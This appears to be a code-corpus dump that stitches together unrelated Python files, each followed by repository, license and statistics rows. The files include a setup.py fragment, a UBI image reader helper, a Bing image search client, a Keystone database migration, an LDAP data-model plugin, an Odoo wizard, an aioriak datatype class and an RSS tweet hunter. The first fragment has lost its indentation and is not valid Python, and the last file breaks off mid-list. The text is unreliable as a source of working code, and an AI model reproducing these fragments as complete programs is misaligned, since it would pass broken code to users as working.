# see http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
# find any static content such as HTML files or CSS
_INCLUDE = re.compile("^.*\.(html|less|css|js|png|gif|jpg|mo|eot|svg|ttf|woff|otf|json|conf|txt|ico)$")
_root_directory='butler'
def get_package_data():
package_data = {}
for pkg in os.listdir(_root_directory):
pkg_path = os.path.join(_root_directory, pkg)
if os.path.isdir(pkg_path):
package_data[pkg] = create_paths(pkg_path)
return package_data
def create_paths(root_dir):
paths = []
is_package = os.path.exists(os.path.join(root_dir, '__init__.py'))
children = os.listdir(root_dir)
for child in children:
childpath = os.path.join(root_dir, child)
if os.path.isfile(childpath) and not is_package and _INCLUDE.match(child):
paths.append(child)
if os.path.isdir(childpath):
paths += [os.path.join( child, path ) for path in create_paths( os.path.join(root_dir, child) ) ]
return paths
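# Illustrative result of create_paths (hypothetical tree): for a
# non-package directory 'static' containing 'css/site.css' and 'js/app.js',
# create_paths('butler/static') would return
# ['css/site.css', 'js/app.js'] (ordering follows os.listdir).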
_reqs_dir = os.path.join(os.path.dirname(__file__), 'requirements')
def _strip_comments(line):
return line.split('#', 1)[0].strip()
def _get_reqs(req):
with open(os.path.join( _reqs_dir, req ) ) as f:
requires = f.readlines()
requires = map(_strip_comments, requires)
requires = filter( lambda x:x.strip()!='', requires )
return requires
_install_requires = _get_reqs('common.txt')
_extras_require = {
'psql': _get_reqs('psql.txt'),
'mysql': _get_reqs('mysql.txt'),
}
_data_files = [('', ['requirements/%s' % reqs_file for reqs_file in os.listdir(_reqs_dir)])]
setup(
name='butler',
version=_version,
packages=_packages,
package_dir={'': 'butler'},
package_data=get_package_data(),
install_requires=_install_requires,
extras_require=_extras_require,
data_files=_data_files,
author='Akvo.org',
author_email='code@akvo.org',
url='https://github.com/akvo/akvo-butler',
license='Affero GPL',
)
|
agpl-3.0
| -8,536,758,986,645,435,000
| 27.693182
| 109
| 0.643564
| false
| 3.184111
| false
| false
| false
|
n3wb13/OpenNfrGui-5.0-1
|
lib/python/Plugins/Extensions/NFR4XBoot/ubi_reader/ui/common.py
|
5
|
3812
|
import os
from ubi_io import leb_virtual_file
from ubifs import ubifs, walk, output
from ubifs.defines import PRINT_UBIFS_KEY_HASH, PRINT_UBIFS_COMPR
from ubi.defines import PRINT_VOL_TYPE_LIST, UBI_VTBL_AUTORESIZE_FLG
output_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'output')
def extract_files(ubifs, out_path, perms = False):
try:
inodes = {}
walk.index(ubifs, ubifs.master_node.root_lnum, ubifs.master_node.root_offs, inodes)
for dent in inodes[1]['dent']:
output.dents(ubifs, inodes, dent, out_path, perms)
except Exception as e:
import traceback
ubifs.log.write('%s' % e)
traceback.print_exc()
def get_ubi_params(ubi):
ubi_flags = {'min_io_size': '-m',
'max_bud_bytes': '-j',
'leb_size': '-e',
'default_compr': '-x',
'sub_page_size': '-s',
'fanout': '-f',
'key_hash': '-k',
'orph_lebs': '-p',
'log_lebs': '-l',
'max_leb_cnt': '-c',
'peb_size': '-p',
'vid_hdr_offset': '-O',
'version': '-x',
'image_seq': '-Q',
'alignment': '-a',
'vol_id': '-n',
'name': '-N'}
ubi_params = {}
ubi_args = {}
ini_params = {}
for image in ubi.images:
img_seq = image.image_seq
ubi_params[img_seq] = {}
ubi_args[img_seq] = {}
ini_params[img_seq] = {}
for volume in image.volumes:
ubi_args[img_seq][volume] = {}
ini_params[img_seq][volume] = {}
ini_params[img_seq][volume]['vol_type'] = PRINT_VOL_TYPE_LIST[image.volumes[volume].vol_rec.vol_type]
if image.volumes[volume].vol_rec.flags == UBI_VTBL_AUTORESIZE_FLG:
ini_params[img_seq][volume]['vol_flags'] = 'autoresize'
else:
ini_params[img_seq][volume]['vol_flags'] = image.volumes[volume].vol_rec.flags
ini_params[img_seq][volume]['vol_id'] = image.volumes[volume].vol_id
ini_params[img_seq][volume]['vol_name'] = image.volumes[volume].name.rstrip('\x00')
ini_params[img_seq][volume]['vol_alignment'] = image.volumes[volume].vol_rec.alignment
ini_params[img_seq][volume]['vol_size'] = image.volumes[volume].vol_rec.reserved_pebs * ubi.leb_size
ufsfile = leb_virtual_file(ubi, image.volumes[volume])
uubifs = ubifs(ufsfile)
for key, value in uubifs.superblock_node:
if key == 'key_hash':
value = PRINT_UBIFS_KEY_HASH[value]
elif key == 'default_compr':
value = PRINT_UBIFS_COMPR[value]
if key in ubi_flags:
ubi_args[img_seq][volume][key] = value
for key, value in image.volumes[volume].vol_rec:
if key == 'name':
value = value.rstrip('\x00')
if key in ubi_flags:
ubi_args[img_seq][volume][key] = value
ubi_args[img_seq][volume]['version'] = image.version
ubi_args[img_seq][volume]['vid_hdr_offset'] = image.vid_hdr_offset
            ubi_args[img_seq][volume]['sub_page_size'] = ubi_args[img_seq][volume]['vid_hdr_offset']
ubi_args[img_seq][volume]['image_seq'] = image.image_seq
ubi_args[img_seq][volume]['peb_size'] = ubi.peb_size
ubi_args[img_seq][volume]['vol_id'] = image.volumes[volume].vol_id
ubi_params[img_seq][volume] = {'flags': ubi_flags,
'args': ubi_args[img_seq][volume],
'ini': ini_params[img_seq][volume]}
return ubi_params
|
gpl-2.0
| 6,523,534,966,752,915,000
| 41.83908
| 113
| 0.543284
| false
| 3.163485
| false
| false
| false
|
DS-CM/live-slides
|
src/GetImage.py
|
1
|
1282
|
import http.client, urllib.request, urllib.parse, urllib.error, base64, json
from pprint import pprint
class GetImage:
def __init__(self, key):
self.key = key
def getImage(self, keywords):
search_string = ""
for x in keywords:
search_string = search_string + " " + x
headers = {
# Request headers
'Ocp-Apim-Subscription-Key': self.key,
}
params = urllib.parse.urlencode({
# Request parameters
'q': search_string,
'count': '1',
'offset': '0',
'mkt': 'en-us',
'safeSearch': 'Strict',
})
try:
conn = http.client.HTTPSConnection('api.cognitive.microsoft.com')
conn.request("GET", "/bing/v5.0/images/search?%s" % params, "{body}", headers)
response = conn.getresponse()
data = json.loads(response.read().decode('utf-8'))
conn.close()
try:
return data['value'][0]['contentUrl']
except IndexError as e:
print("David wants to output this error: {}".format(e))
return None
        except Exception as e:
            # Not every exception carries errno/strerror; fall back to str(e).
            print("[Errno {0}] {1}".format(getattr(e, 'errno', '?'),
                                           getattr(e, 'strerror', None) or str(e)))
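# Hedged usage sketch: 'YOUR_BING_KEY' is a placeholder subscription key and
# the call performs a live HTTP request, so this is illustrative only.
if __name__ == '__main__':
    client = GetImage('YOUR_BING_KEY')
    print(client.getImage(['sunset', 'mountains']))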
|
apache-2.0
| 6,372,495,451,247,394,000
| 28.136364
| 90
| 0.513261
| false
| 4.162338
| false
| false
| false
|
paypal/keystone
|
keystone/common/sql/migrate_repo/versions/016_normalize_domain_ids.py
|
1
|
19579
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Normalize for domain_id, i.e. ensure User and Project entities have the
domain_id as a first class attribute.
Both User and Project (as well as Group) entities are owned by a
domain, which is implemented as each having a domain_id foreign key
in their sql representation that points back to the respective
domain in the domain table. This domain_id attribute should also
be required (i.e. not nullable).
Adding a non_nullable foreign key attribute to a table with existing
data causes a few problems since not all DB engines support the
ability to either control the triggering of integrity constraints
or the ability to modify columns after they are created.
To get round the above inconsistencies, two versions of the
upgrade/downgrade functions are supplied, one for those engines
that support dropping columns, and one for those that don't. For
the latter we are forced to do table copy AND control the triggering
of integrity constraints.
"""
import sqlalchemy as sql
from sqlalchemy.orm import sessionmaker
from keystone import config
CONF = config.CONF
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
def _disable_foreign_constraints(session, migrate_engine):
if migrate_engine.name == 'mysql':
session.execute('SET foreign_key_checks = 0;')
def _enable_foreign_constraints(session, migrate_engine):
if migrate_engine.name == 'mysql':
session.execute('SET foreign_key_checks = 1;')
def upgrade_user_table_with_copy(meta, migrate_engine, session):
# We want to add the domain_id attribute to the user table. Since
# it is non nullable and the table may have data, easiest way is
# a table copy. Further, in order to keep foreign key constraints
    # pointing at the right table, we need to be able to do a table
# DROP then CREATE, rather than ALTERing the name of the table.
# First make a copy of the user table
temp_user_table = sql.Table(
'temp_user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('password', sql.String(128)),
sql.Column('enabled', sql.Boolean, default=True))
temp_user_table.create(migrate_engine, checkfirst=True)
user_table = sql.Table('user', meta, autoload=True)
for user in session.query(user_table):
session.execute('insert into temp_user (id, name, extra, '
'password, enabled) '
'values ( :id, :name, :extra, '
':password, :enabled);',
{'id': user.id,
'name': user.name,
'extra': user.extra,
'password': user.password,
'enabled': user.enabled})
# Now switch off constraints while we drop and then re-create the
# user table, with the additional domain_id column
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table user;')
# Need to create a new metadata stream since we are going to load a
# different version of the user table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
domain_table = sql.Table('domain', meta2, autoload=True)
user_table = sql.Table(
'user',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.Column("password", sql.String(128)),
sql.Column("enabled", sql.Boolean, default=True),
sql.Column('domain_id', sql.String(64), sql.ForeignKey('domain.id'),
nullable=False),
sql.UniqueConstraint('domain_id', 'name'))
user_table.create(migrate_engine, checkfirst=True)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for user in session.query(temp_user_table):
session.execute('insert into user (id, name, extra, '
'password, enabled, domain_id) '
'values ( :id, :name, :extra, '
':password, :enabled, :domain_id);',
{'id': user.id,
'name': user.name,
'extra': user.extra,
'password': user.password,
'enabled': user.enabled,
'domain_id': DEFAULT_DOMAIN_ID})
_enable_foreign_constraints(session, migrate_engine)
session.execute('drop table temp_user;')
def upgrade_project_table_with_copy(meta, migrate_engine, session):
# We want to add the domain_id attribute to the project table. Since
# it is non nullable and the table may have data, easiest way is
# a table copy. Further, in order to keep foreign key constraints
    # pointing at the right table, we need to be able to do a table
# DROP then CREATE, rather than ALTERing the name of the table.
    # First make a copy of the project table
temp_project_table = sql.Table(
'temp_project',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True))
temp_project_table.create(migrate_engine, checkfirst=True)
project_table = sql.Table('project', meta, autoload=True)
for project in session.query(project_table):
session.execute('insert into temp_project (id, name, extra, '
'description, enabled) '
'values ( :id, :name, :extra, '
':description, :enabled);',
{'id': project.id,
'name': project.name,
'extra': project.extra,
'description': project.description,
'enabled': project.enabled})
# Now switch off constraints while we drop and then re-create the
# project table, with the additional domain_id column
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table project;')
# Need to create a new metadata stream since we are going to load a
# different version of the project table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
domain_table = sql.Table('domain', meta2, autoload=True)
project_table = sql.Table(
'project',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True),
sql.Column('domain_id', sql.String(64), sql.ForeignKey('domain.id'),
nullable=False),
sql.UniqueConstraint('domain_id', 'name'))
project_table.create(migrate_engine, checkfirst=True)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for project in session.query(temp_project_table):
session.execute('insert into project (id, name, extra, '
'description, enabled, domain_id) '
'values ( :id, :name, :extra, '
':description, :enabled, :domain_id);',
{'id': project.id,
'name': project.name,
'extra': project.extra,
'description': project.description,
'enabled': project.enabled,
'domain_id': DEFAULT_DOMAIN_ID})
_enable_foreign_constraints(session, migrate_engine)
session.execute('drop table temp_project;')
def downgrade_user_table_with_copy(meta, migrate_engine, session):
# For engines that don't support dropping columns, we need to do this
# as a table copy. Further, in order to keep foreign key constraints
    # pointing at the right table, we need to be able to do a table
# DROP then CREATE, rather than ALTERing the name of the table.
    # First make a copy of the user table
temp_user_table = sql.Table(
'temp_user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('password', sql.String(128)),
sql.Column('enabled', sql.Boolean, default=True),
sql.Column('extra', sql.Text()))
temp_user_table.create(migrate_engine, checkfirst=True)
user_table = sql.Table('user', meta, autoload=True)
for user in session.query(user_table):
session.execute('insert into temp_user (id, name, '
'password, enabled, extra) '
'values ( :id, :name, '
':password, :enabled, :extra);',
{'id': user.id,
'name': user.name,
'password': user.password,
'enabled': user.enabled,
'extra': user.extra})
# Now switch off constraints while we drop and then re-create the
# user table, less the columns we wanted to drop
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table user;')
# Need to create a new metadata stream since we are going to load a
# different version of the user table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
user_table = sql.Table(
'user',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('password', sql.String(128)),
sql.Column('enabled', sql.Boolean, default=True))
user_table.create(migrate_engine, checkfirst=True)
_enable_foreign_constraints(session, migrate_engine)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for user in session.query(temp_user_table):
session.execute('insert into user (id, name, extra, '
'password, enabled) '
'values ( :id, :name, :extra, '
':password, :enabled);',
{'id': user.id,
'name': user.name,
'extra': user.extra,
'password': user.password,
'enabled': user.enabled})
session.execute('drop table temp_user;')
def downgrade_project_table_with_copy(meta, migrate_engine, session):
# For engines that don't support dropping columns, we need to do this
# as a table copy. Further, in order to keep foreign key constraints
    # pointing at the right table, we need to be able to do a table
# DROP then CREATE, rather than ALTERing the name of the table.
    # First make a copy of the project table
temp_project_table = sql.Table(
'temp_project',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True),
sql.Column('extra', sql.Text()))
temp_project_table.create(migrate_engine, checkfirst=True)
project_table = sql.Table('project', meta, autoload=True)
for project in session.query(project_table):
session.execute('insert into temp_project (id, name, '
'description, enabled, extra) '
'values ( :id, :name, '
':description, :enabled, :extra);',
{'id': project.id,
'name': project.name,
'description': project.description,
'enabled': project.enabled,
'extra': project.extra})
# Now switch off constraints while we drop and then re-create the
# project table, less the columns we wanted to drop
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table project;')
# Need to create a new metadata stream since we are going to load a
# different version of the project table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
project_table = sql.Table(
'project',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True))
project_table.create(migrate_engine, checkfirst=True)
_enable_foreign_constraints(session, migrate_engine)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for project in session.query(temp_project_table):
session.execute('insert into project (id, name, extra, '
'description, enabled) '
'values ( :id, :name, :extra, '
':description, :enabled);',
{'id': project.id,
'name': project.name,
'extra': project.extra,
'description': project.description,
'enabled': project.enabled})
session.execute("drop table temp_project;")
def upgrade_user_table_with_col_create(meta, migrate_engine, session):
# Create the domain_id column. We want this to be not nullable
# but also a foreign key. We can't create this right off the
# bat since any existing rows would cause an Integrity Error.
# We therefore create it nullable, fill the column with the
# default data and then set it to non nullable.
domain_table = sql.Table('domain', meta, autoload=True)
user_table = sql.Table('user', meta, autoload=True)
user_table.create_column(
sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=True))
for user in session.query(user_table).all():
values = {'domain_id': DEFAULT_DOMAIN_ID}
update = user_table.update().\
where(user_table.c.id == user.id).\
values(values)
migrate_engine.execute(update)
# Need to commit this or setting nullable to False will fail
session.commit()
user_table.columns.domain_id.alter(nullable=False)
# Finally, change the uniqueness settings for the name attribute
session.execute('ALTER TABLE "user" DROP CONSTRAINT user_name_key;')
session.execute('ALTER TABLE "user" ADD CONSTRAINT user_dom_name_unique '
'UNIQUE (domain_id, name);')
def upgrade_project_table_with_col_create(meta, migrate_engine, session):
# Create the domain_id column. We want this to be not nullable
# but also a foreign key. We can't create this right off the
# bat since any existing rows would cause an Integrity Error.
# We therefore create it nullable, fill the column with the
# default data and then set it to non nullable.
domain_table = sql.Table('domain', meta, autoload=True)
project_table = sql.Table('project', meta, autoload=True)
project_table.create_column(
sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=True))
for project in session.query(project_table).all():
values = {'domain_id': DEFAULT_DOMAIN_ID}
update = project_table.update().\
where(project_table.c.id == project.id).\
values(values)
migrate_engine.execute(update)
# Need to commit this or setting nullable to False will fail
session.commit()
project_table.columns.domain_id.alter(nullable=False)
# Finally, change the uniqueness settings for the name attribute
session.execute('ALTER TABLE project DROP CONSTRAINT tenant_name_key;')
session.execute('ALTER TABLE project ADD CONSTRAINT proj_dom_name_unique '
'UNIQUE (domain_id, name);')
def downgrade_user_table_with_col_drop(meta, migrate_engine, session):
# Revert uniqueness settings for the name attribute
session.execute('ALTER TABLE "user" DROP CONSTRAINT '
'user_dom_name_unique;')
session.execute('ALTER TABLE "user" ADD UNIQUE (name);')
session.commit()
    # And now go ahead and drop the domain_id column
domain_table = sql.Table('domain', meta, autoload=True)
user_table = sql.Table('user', meta, autoload=True)
column = sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=False)
column.drop(user_table)
def downgrade_project_table_with_col_drop(meta, migrate_engine, session):
# Revert uniqueness settings for the name attribute
session.execute('ALTER TABLE project DROP CONSTRAINT '
'proj_dom_name_unique;')
session.execute('ALTER TABLE project ADD CONSTRAINT tenant_name_key '
'UNIQUE (name);')
session.commit()
    # And now go ahead and drop the domain_id column
domain_table = sql.Table('domain', meta, autoload=True)
project_table = sql.Table('project', meta, autoload=True)
column = sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=False)
column.drop(project_table)
def upgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
session = sessionmaker(bind=migrate_engine)()
if migrate_engine.name in ['sqlite', 'mysql']:
upgrade_user_table_with_copy(meta, migrate_engine, session)
upgrade_project_table_with_copy(meta, migrate_engine, session)
else:
upgrade_user_table_with_col_create(meta, migrate_engine, session)
upgrade_project_table_with_col_create(meta, migrate_engine, session)
session.commit()
session.close()
def downgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
session = sessionmaker(bind=migrate_engine)()
if migrate_engine.name in ['sqlite', 'mysql']:
downgrade_user_table_with_copy(meta, migrate_engine, session)
downgrade_project_table_with_copy(meta, migrate_engine, session)
else:
# MySQL should in theory be able to use this path, but seems to
# have problems dropping columns which are foreign keys
downgrade_user_table_with_col_drop(meta, migrate_engine, session)
downgrade_project_table_with_col_drop(meta, migrate_engine, session)
session.commit()
session.close()
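# Hedged sketch (not part of the original migration): sqlalchemy-migrate
# normally drives upgrade()/downgrade() itself. Assuming a database on which
# the earlier migrations (including the domain table) have already been
# applied, the entry points can be exercised directly:
if __name__ == '__main__':
    engine = sql.create_engine('sqlite:////tmp/keystone.db')
    upgrade(engine)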
|
apache-2.0
| 4,975,266,049,065,287,000
| 44.21709
| 78
| 0.623117
| false
| 4.145458
| false
| false
| false
|
hpc/hypnotoad
|
hypnotoad/plugins/datamodels/ldap/ldap_plugin.py
|
1
|
3400
|
#
# An ldap data model plugin for hypnotoad.
#
import ldap
import logging
from hypnotoad.core import plugin
LOG = logging.getLogger('root')
class ldap_plugin(plugin.data_model_plugin):
def setup(self, config, model_version):
"""Called before the plugin is asked to do anything."""
if config.getboolean('Data Model Options', 'ldap_plugin_enabled'):
self.plugin_enabled = True
LOG.debug("LDAP plugin enabled")
ldap_url = config.get('Data Model Options', 'ldap_server')
ldap_dc = config.get('Data Model Options', 'ldap_dc')
ldap_ou_group = config.get('Data Model Options', 'ldap_ou_group')
ldap_ou_user = config.get('Data Model Options', 'ldap_ou_user')
ldap_timeout = config.getfloat(
'Data Model Options', 'ldap_timeout')
self.ldap_dn_user = "ou=" + ldap_ou_user + "," + ldap_dc
self.ldap_dn_group = "ou=" + ldap_ou_group + "," + ldap_dc
LOG.debug("URL: " + ldap_url)
LOG.debug("Base DC: " + ldap_dc)
LOG.debug("DN for groups: " + self.ldap_dn_group)
LOG.debug("DN for users: " + self.ldap_dn_user)
self.ldap_ctx = ldap.initialize(ldap_url)
self.ldap_ctx.set_option(ldap.OPT_NETWORK_TIMEOUT, ldap_timeout)
self.config = config
self.model_version = model_version
else:
self.plugin_enabled = False
def teardown(self):
"""Called to allow the plugin to free anything."""
if self.plugin_enabled:
LOG.debug("Got to ldap plugin teardown")
self.ldap_ctx.unbind_s()
def get_model(self):
"""Look up information in this data model."""
model = []
if self.plugin_enabled:
LOG.debug("Got to ldap plugin get_model")
model.append(
{'little_lang_entry': {'version': self.model_version}})
def ldap_search(dn, attrs):
return self.ldap_ctx.search_s(dn, ldap.SCOPE_SUBTREE, '(cn=*)', attrs)
users = ldap_search(self.ldap_dn_user, [
'cn', 'gidNumber', 'homeDirectory', 'uid',
'uidNumber', 'gecos', 'hpcDRMadef', 'loginShell'
])
LOG.debug("Found " + str(len(users)) + " users.")
for u in users:
dn, attrs = u
model.append({'user_entry': {
'short_name_string': attrs['uid'][0],
'full_name_string': attrs['cn'][0],
'group_id_integer': attrs['gidNumber'][0],
'user_id_integer': attrs['uidNumber'][0],
'home_directory_string': attrs['homeDirectory'][0],
'login_shell_string': attrs['loginShell'][0],
'priority_fairshare_float': '',
'priority_qos_name_array': ''
}})
groups = ldap_search(
self.ldap_dn_group, ['cn', 'hpcDRMshare', 'memberUid'])
for g in groups:
dn, attrs = g
LOG.debug("Found group with DN: " + dn)
model.append({'group_entry': {
'short_name_string': attrs['cn'][0],
'priority_fairshare_float': attrs['hpcDRMshare'][0],
}})
return model
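# Hedged usage sketch (illustrative, not part of the plugin): assumes a
# ConfigParser instance carrying the 'Data Model Options' entries referenced
# above, a reachable LDAP server, and a no-argument base-class constructor.
def _example_usage(config):
    instance = ldap_plugin()
    instance.setup(config, model_version='1')
    try:
        return instance.get_model()
    finally:
        instance.teardown()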
# EOF
|
bsd-3-clause
| 450,297,542,380,948,160
| 32.333333
| 86
| 0.519412
| false
| 3.944316
| true
| false
| false
|
hanelsofterp/green-hanel
|
purchase_landed_cost_assigning_before_receiving/wizard/wizard_import.py
|
1
|
1127
|
__author__ = 'trananhdung'
from openerp import models, fields, api
class extendPickingImportWizard(models.TransientModel):
_inherit = 'picking.import.wizard'
pickings = fields.Many2many(
comodel_name='stock.picking',
relation='distribution_import_picking_rel', column1='wizard_id',
column2='picking_id', string='Incoming shipments',
domain="[('partner_id', 'child_of', supplier),"
"('location_id.usage', '=', 'supplier'),"
"('id', 'not in', prev_pickings[0][2]),"
"('state', 'in', ('landed_cost','done'))]", required=True)
@api.multi
def action_import_picking(self):
self.ensure_one()
# for picking in self.pickings:
# for move in picking.move_lines:
# self.env['purchase.cost.distribution.line'].create(
# self._prepare_distribution_line(move))
self.pickings.write({
'distribution_id': self.env.context.get('active_id', False)
})
return super(extendPickingImportWizard, self).action_import_picking()
|
gpl-3.0
| 947,077,968,450,730,200
| 38.25
| 77
| 0.582076
| false
| 3.899654
| false
| false
| false
|
rambler-digital-solutions/aioriak
|
aioriak/datatypes/datatype.py
|
1
|
4884
|
from . import TYPES
from aioriak.error import ContextRequired
class Datatype:
'''
Base class for all convergent datatype wrappers. You will not use
    this class directly, but it does define some methods that are common
    to all datatype wrappers.
'''
#: The string "name" of this datatype. Each datatype should set this.
type_name = None
def __init__(self, bucket=None, key=None, value=None, context=None):
self.bucket = bucket
self.key = key
self._context = context
if value is not None:
self._set_value(value)
else:
self._set_value(self._default_value())
self._post_init()
@property
def value(self):
'''
The pure, immutable value of this datatype, as a Python value,
which is unique for each datatype.
**NB**: Do not use this property to mutate data, as it will not
have any effect. Use the methods of the individual type to effect
changes. This value is guaranteed to be independent of any internal
data representation.
'''
return self._value
@property
def context(self):
'''
The opaque context for this type, if it was previously fetched.
:rtype: str
'''
if self._context:
return self._context[:]
@property
def modified(self):
'''
Whether this datatype has staged local modifications.
:rtype: bool
'''
raise NotImplementedError
# Lifecycle methods
async def reload(self, **params):
'''
Reloads the datatype from Riak.
        .. warning:: This clears any local modifications you might have
            made.
:rtype: :class:`Datatype`
'''
if not self.bucket:
raise ValueError('bucket property not assigned')
if not self.key:
raise ValueError('key property not assigned')
dtype, value, context = await self.bucket._client._fetch_datatype(
self.bucket, self.key, **params)
if not dtype == self.type_name:
raise TypeError("Expected datatype {} but "
"got datatype {}".format(self.__class__,
TYPES[dtype]))
self.clear()
self._context = context
self._set_value(value)
return self
async def delete(self, **params):
'''
Deletes the datatype from Riak. See :meth:`RiakClient.delete()
<aioriak.client.RiakClient.delete>` for options.
'''
self.clear()
self._context = None
self._set_value(self._default_value())
await self.bucket._client.delete(self, **params)
return self
async def update(self, **params):
'''
Sends locally staged mutations to Riak.
:rtype: a subclass of :class:`~aioriak.datatypes.Datatype`
'''
if not self.modified:
raise ValueError("No operation to perform")
params.setdefault('return_body', True)
await self.bucket._client.update_datatype(self, **params)
self.clear()
return self
store = update
def clear(self):
'''
Removes all locally staged mutations.
'''
self._post_init()
def to_op(self):
'''
Extracts the mutation operation from this datatype, if any.
Each type must implement this method, returning the
appropriate operation, or `None` if there is no queued
mutation.
'''
raise NotImplementedError
# Private stuff
def _set_value(self, value):
self._raise_if_badtype(value)
self._value = self._coerce_value(value)
def _raise_if_badtype(self, new_value):
if not self._check_type(new_value):
raise TypeError(self._type_error_msg)
def _check_type(self, new_value):
'''
Checks that initial values of the type are appropriate. Each
type must implement this method.
:rtype: bool
'''
raise NotImplementedError
def _default_value(self):
'''
Returns what the initial value of an empty datatype should be.
'''
raise NotImplementedError
def _coerce_value(self, new_value):
'''
Coerces the input value into the internal representation for
the type. Datatypes may override this method.
'''
return new_value
def _post_init(self):
'''
Called at the end of :meth:`__init__` so that subclasses can tweak
their own setup without overriding the constructor.
'''
pass
def _require_context(self):
'''
Raises an exception if the context is not present
'''
if not self._context:
raise ContextRequired()
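# A minimal illustrative subclass (not part of aioriak itself) showing which
# hooks a concrete datatype wrapper is expected to fill in. The name and the
# staged-mutation scheme are assumptions for demonstration purposes.
class ExampleFlag(Datatype):
    type_name = 'example_flag'
    _type_error_msg = 'ExampleFlag values must be bool'

    def _default_value(self):
        return False

    def _check_type(self, new_value):
        return isinstance(new_value, bool)

    def _post_init(self):
        self._pending = None  # staged local mutation, if any

    @property
    def modified(self):
        return self._pending is not None

    def to_op(self):
        return ('assign', self._pending) if self.modified else None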
|
mit
| -50,095,760,985,934,680
| 27.231214
| 75
| 0.577805
| false
| 4.620624
| false
| false
| false
|
nschaetti/pyTweetBot
|
pyTweetBot/tweet/RSSHunter.py
|
1
|
2080
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import feedparser
from .Hunter import Hunter
from .Tweet import Tweet
import logging
from textblob import TextBlob
# Find new tweets from RSS streams
class RSSHunter(Hunter):
"""
Find new tweets from RSS streams
"""
# Constructor
def __init__(self, stream):
self._stream = stream
self._stream_url = stream['url']
logging.debug(u"Retreiving RSS stream {}".format(self._stream_url))
self._entries = feedparser.parse(self._stream_url)['entries']
self._hashtags = stream['hashtags'] if 'hashtags' in stream else list()
self._lang = stream['lang']
self._current = 0
# end __init__
# Get stream
def get_stream(self):
"""
Get stream
"""
return self._stream
# end get_stream
# To unicode
def __unicode__(self):
"""
To unicode
:return:
"""
return u"RSSHunter(stream={})".format(self._stream)
# end __unicode__
# Iterator
def __iter__(self):
"""
Iterator
:return:
"""
return self
# end __iter__
# Next
def next(self):
"""
Next
:return:
"""
if self._current >= len(self._entries):
raise StopIteration
# end if
# Found
found = False
while not found and self._current < len(self._entries):
# Get current entry
current_entry = self._entries[self._current]
# Analyze text
tweet_blob = TextBlob(current_entry['title'])
# Right language
if tweet_blob.detect_language() in self._lang:
found = True
# end if
# Next
self._current += 1
# end while
# Tweet generator
if found:
return Tweet(current_entry['title'], current_entry['links'][0]['href'], self._hashtags)
else:
raise StopIteration
# end if
# end next
# end RSSHunter
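# Hedged usage sketch: the feed URL is a placeholder, and both construction
# and iteration perform live HTTP requests (feed fetch, language detection),
# so this is illustrative only.
if __name__ == '__main__':
    hunter = RSSHunter({
        'url': 'http://example.com/feed.rss',
        'lang': ['en'],
        'hashtags': ['#news'],
    })
    for tweet in hunter:
        print(tweet)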
|
gpl-3.0
| -6,919,431,503,497,942,000
| 21.608696
| 99
| 0.522115
| false
| 4.262295
| false
| false
| false
|
Dymaxion00/KittenGroomer
|
fs/opt/groomer/functions_pier9.py
|
1
|
2525
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from helpers import FileBase, KittenGroomerBase, main
printers = ['.STL', '.obj']
cnc = ['.nc', '.tap', '.gcode', '.dxf', '.stl', '.obj', '.iges', '.igs',
'.vrml', '.vrl', '.thing', '.step', '.stp', '.x3d']
